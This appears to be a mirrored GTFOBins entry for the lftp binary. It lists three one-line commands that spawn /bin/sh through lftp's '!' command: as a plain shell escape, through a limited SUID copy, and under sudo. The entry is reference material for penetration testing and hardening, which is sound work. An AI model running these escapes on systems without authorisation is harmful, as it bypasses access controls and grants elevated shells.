mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 22:40:10 +01:00
10 lines
152 B
Markdown
10 lines
152 B
Markdown
|
---
|
||
|
functions:
|
||
|
shell:
|
||
|
- code: lftp -c '!/bin/sh'
|
||
|
limited-suid:
|
||
|
- code: ./lftp -c '!/bin/sh'
|
||
|
sudo:
|
||
|
- code: sudo lftp -c '!/bin/sh'
|
||
|
---
|